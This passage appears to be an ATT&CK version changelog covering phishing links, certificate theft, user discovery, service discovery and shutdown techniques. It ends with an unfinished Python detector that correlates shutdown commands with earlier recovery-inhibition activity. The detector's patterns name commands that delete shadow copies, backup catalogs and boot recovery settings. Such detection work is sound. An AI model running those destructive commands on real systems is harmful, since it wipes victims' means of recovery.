targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. Adversaries may also link to "web bugs" or "web beacons" within phishing messages to verify the receipt of an email, while also potentially profiling and tracking victim information such as IP address.(Citation: NIST Web Bug) Adversaries may also be able to spoof a complete website using what is known as a "browser-in-the-browser" (BitB) attack. By generating a fake browser popup window with an HTML-based address bar that appears to contain a legitimate URL (such as an authentication portal), they may be able to prompt users to enter their credentials while bypassing typical URL verification methods.(Citation: ZScaler BitB 2020)(Citation: Mr. D0x BitB 2022) From the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_contributors[4] | Menachem Goldstein | Elpidoforos Maragkos, @emaragkos
x_mitre_data_sources[1] | Application Log: Application Log Content | Network Traffic: Network Traffic Flow
x_mitre_data_sources[2] | Network Traffic: Network Traffic Flow | Application Log: Application Log Content
x_mitre_version | 1.3 | 1.4

iterable_item_added
STIX Field | Old value | New value
external_references |  | {'source_name': 'Mr. D0x BitB 2022', 'description': 'mr.d0x. (2022, March 15). Browser In The Browser (BITB) Attack. Retrieved March 8, 2023.', 'url': 'https://mrd0x.com/browser-in-the-browser-phishing-attack/'}
external_references |  | {'source_name': 'NIST Web Bug', 'description': 'NIST Information Technology Laboratory. (n.d.). web bug. Retrieved March 22, 2023.', 'url': 'https://csrc.nist.gov/glossary/term/web_bug'}
external_references |  | {'source_name': 'ZScaler BitB 2020', 'description': 'ZScaler. (2020, February 11). Fake Sites Stealing Steam Credentials. Retrieved March 8, 2023.', 'url': 'https://www.zscaler.com/blogs/security-research/fake-sites-stealing-steam-credentials'}
x_mitre_contributors |  | Menachem Goldstein
x_mitre_contributors |  | Joas Antonio dos Santos, @C0d3Cr4zy

[T1566.002] Phishing: Spearphishing Link

Current version: 2.4

Version changed from: 2.3 → 2.4


Old Description:

Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").(Citation: CISA IDN ST05-016)

Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021)

New Description:

Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").(Citation: CISA IDN ST05-016)

Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021)
Details

values_changed
STIX Field | Old value | New Value
modified | 2022-10-21 16:01:45.500000+00:00 | 2023-04-11 00:44:21.193000+00:00
description |
Old value: Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").(Citation: CISA IDN ST05-016) Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021)
New value: Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").(Citation: CISA IDN ST05-016) Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021)
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.3 | 2.4

iterable_item_added
STIX Field | Value
x_mitre_data_sources | Application Log: Application Log Content

iterable_item_removed
STIX Field | Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/163.html', 'external_id': 'CAPEC-163'}
x_mitre_data_sources | Application Log: Application Log Content

[T1649] Steal or Forge Authentication Certificates

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description:

Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)

Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)

Abusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://attack.mitre.org/tactics/TA0008). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://attack.mitre.org/tactics/TA0003) via stealing or forging certificates that can be used as [Valid Accounts](https://attack.mitre.org/techniques/T1078) for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts.

Adversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://attack.mitre.org/tactics/TA0003) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).(Citation: Medium Certified Pre Owned) Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) ticket-granting tickets (TGT) or NTLM plaintext.(Citation: Medium Certified Pre Owned)

New Description:

Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)

Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)

Abusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://attack.mitre.org/tactics/TA0008). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://attack.mitre.org/tactics/TA0003) via stealing or forging certificates that can be used as [Valid Accounts](https://attack.mitre.org/techniques/T1078) for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts.

Adversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://attack.mitre.org/tactics/TA0003) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).(Citation: Medium Certified Pre Owned) Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) ticket-granting tickets (TGT) or NTLM plaintext.(Citation: Medium Certified Pre Owned)
Details

values_changed
STIX Field | Old value | New Value
modified | 2022-10-21 21:02:00.546000+00:00 | 2023-03-02 19:06:41.828000+00:00
description |
Old value: Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview) Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned) Abusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://attack.mitre.org/tactics/TA0008). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://attack.mitre.org/tactics/TA0003) via stealing or forging certificates that can be used as [Valid Accounts](https://attack.mitre.org/techniques/T1078) for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts. Adversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://attack.mitre.org/tactics/TA0003) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).(Citation: Medium Certified Pre Owned) Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) ticket-granting tickets (TGT) or NTLM plaintext.(Citation: Medium Certified Pre Owned)
New value: Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview) Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned) Abusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://attack.mitre.org/tactics/TA0008). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://attack.mitre.org/tactics/TA0003) via stealing or forging certificates that can be used as [Valid Accounts](https://attack.mitre.org/techniques/T1078) for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts. Adversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://attack.mitre.org/tactics/TA0003) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).(Citation: Medium Certified Pre Owned) Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) ticket-granting tickets (TGT) or NTLM plaintext.(Citation: Medium Certified Pre Owned)
external_references[1]['description'] | HarmJ0y & subat0mik. (2018, August 22). SharpDPAPI - Certificates. Retrieved August 2, 2022. | HarmJ0y. (2018, August 22). SharpDPAPI - Certificates. Retrieved August 2, 2022.
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[1] | Command: Command Execution | Active Directory: Active Directory Object Modification
x_mitre_version | 1.0 | 1.1

iterable_item_added
STIX Field | Value
external_references | {'source_name': 'APT29 Deep Look at Credential Roaming', 'description': 'Thibault Van Geluwe De Berlaere. (2022, November 8). They See Me Roaming: Following APT29 by Taking a Deeper Look at Windows Credential Roaming. Retrieved November 9, 2022.', 'url': 'https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming'}
x_mitre_data_sources | Application Log: Application Log Content
x_mitre_data_sources | Command: Command Execution

iterable_item_removed
STIX Field | Value
x_mitre_data_sources | Application Log: Application Log Content
x_mitre_data_sources | Active Directory: Active Directory Object Modification

[T1033] System Owner/User Discovery

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description:

Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Various utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.

New Description:

Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Various utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.

On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)

Dropped Mitigations:

Details

dictionary_item_added
STIX Field | Value
x_mitre_contributors | ['Austin Clark, @c2defense']
external_references | Cisco. (2023, March 7). Cisco IOS Security Command Reference: Commands S to Z. Retrieved July 13, 2022.

dictionary_item_removed
STIX Field | Value
external_references | CAPEC-577

values_changed
STIX Field | Old value | New Value
modified | 2022-04-20 19:04:03.271000+00:00 | 2023-04-12 23:35:40.261000+00:00
description |
Old value: Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Various utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME% and $USER, may also be used to access this information.
New value: Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Various utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME% and $USER, may also be used to access this information. On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)
external_references[1]['source_name'] | capec | show_ssh_users_cmd_cisco
external_references[1]['url'] | https://capec.mitre.org/data/definitions/577.html | https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s5.html
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[0] | Windows Registry: Windows Registry Key Access | Process: OS API Execution
x_mitre_data_sources[7] | Process: OS API Execution | Windows Registry: Windows Registry Key Access
x_mitre_data_sources[8] | Active Directory: Active Directory Object Access | Command: Command Execution
x_mitre_detection |
Old value: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
New value: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). For network infrastructure devices, collect AAA logging to monitor `show` commands being run by non-standard users from non-standard locations.
x_mitre_version | 1.3 | 1.4
x_mitre_data_sources[3] | Command: Command Execution | Active Directory: Active Directory Object Access

iterable_item_added
STIX Field | Value
external_references | {'source_name': 'US-CERT TA18-106A Network Infrastructure Devices 2018', 'description': 'US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://us-cert.cisa.gov/ncas/alerts/TA18-106A'}
x_mitre_data_sources | Network Traffic: Network Traffic Content
x_mitre_platforms | Network

iterable_item_removed
STIX Field | Value
x_mitre_data_sources | Network Traffic: Network Traffic Content

[T1007] System Service Discovery

Current version: 1.5

Version changed from: 1.4 → 1.5

Dropped Mitigations:

Details

values_changed
STIX Field | Old value | New Value
modified | 2022-07-15 13:35:54.740000+00:00 | 2023-04-03 18:55:18.326000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.4 | 1.5

iterable_item_added
STIX Field | Value
x_mitre_data_sources | Command: Command Execution

iterable_item_removed
STIX Field | Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/574.html', 'external_id': 'CAPEC-574'}
x_mitre_data_sources | Command: Command Execution

[T1529] System Shutdown/Reboot

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description:

Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. <code>reload</code>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.

Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)

New Description:

Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. <code>reload</code>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)

Shutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.

Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)
Details
values_changed
STIX Field: Old value → New Value
modified: 2022-10-20 18:27:57.587000+00:00 → 2023-03-22 20:45:22.531000+00:00
description:
Old value: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users. Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)
New value: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery. Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_data_sources[0]: Process: Process Creation → Command: Command Execution
x_mitre_data_sources[2]: Command: Command Execution → Process: Process Creation
x_mitre_version: 1.2 → 1.3
iterable_item_added
STIX Field: New Value
x_mitre_contributors: Hubert Mank
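The sentence added in v13 (a shutdown "impeding incident response/recovery", typically issued after Disk Structure Wipe or Inhibit System Recovery) is the detection angle that matters: a forced shutdown on its own is routine, a forced shutdown minutes after shadow copies were deleted on the same host is not. The following is an added example, not ATT&CK's or any vendor's code, that applies that correlation to process-creation telemetry. The event records are constructed and carry only the fields Sysmon Event ID 1 / Windows 4688 provide; the impact indicators are the common Inhibit System Recovery (T1490) command lines. The network-device `reload` case from the description would come from AAA command accounting rather than process events and is not covered here.

```python
"""Correlate forced shutdown/reboot commands (T1529) with earlier recovery
inhibition on the same host, using process-creation telemetry.

Added example, not ATT&CK's code. SAMPLE_EVENTS is constructed data.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class ProcEvent:
    ts: datetime
    host: str
    user: str
    cmdline: str


# shutdown.exe, optionally quoted and/or with a full path, followed by its switches.
_SHUTDOWN_RE = re.compile(r'^"?(?:[^\s"]*\\)?shutdown(?:\.exe)?"?\s+(?P<args>.*)$', re.I)
# Switches that shut down, restart or power off; /a (abort) and /l (log off) are excluded.
_FORCE_SWITCHES = {"/s", "/r", "/p", "-s", "-r", "-p"}

# Earlier-impact indicators on the same host (Inhibit System Recovery, T1490).
_IMPACT_PATTERNS = (
    (re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I), "vssadmin delete shadows"),
    (re.compile(r"wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I), "wmic shadowcopy delete"),
    (re.compile(r"wbadmin(?:\.exe)?\s+delete\s+catalog", re.I), "wbadmin delete catalog"),
    (re.compile(r"bcdedit(?:\.exe)?\b.*recoveryenabled\s+no", re.I), "bcdedit recoveryenabled no"),
)


def is_forced_shutdown(cmdline: str) -> bool:
    """True for shutdown.exe invoked with a shutdown/restart/power-off switch."""
    m = _SHUTDOWN_RE.match(cmdline.strip())
    if not m:
        return False
    switches = {tok.lower() for tok in m.group("args").split()}
    return bool(switches & _FORCE_SWITCHES)


def impact_indicators(cmdline: str) -> list[str]:
    """Labels of every T1490-style indicator present in one command line."""
    return [label for rx, label in _IMPACT_PATTERNS if rx.search(cmdline)]


def correlate(events: list[ProcEvent], window: timedelta = timedelta(minutes=30)) -> list[dict]:
    """One finding per forced shutdown. Severity is 'high' when an impact indicator
    ran on the same host within `window` before it, otherwise 'medium'."""
    ordered = sorted(events, key=lambda e: e.ts)
    findings = []
    for i, ev in enumerate(ordered):
        if not is_forced_shutdown(ev.cmdline):
            continue
        prior = [
            label
            for e in ordered[:i]
            if e.host == ev.host and ev.ts - e.ts <= window
            for label in impact_indicators(e.cmdline)
        ]
        findings.append({
            "host": ev.host,
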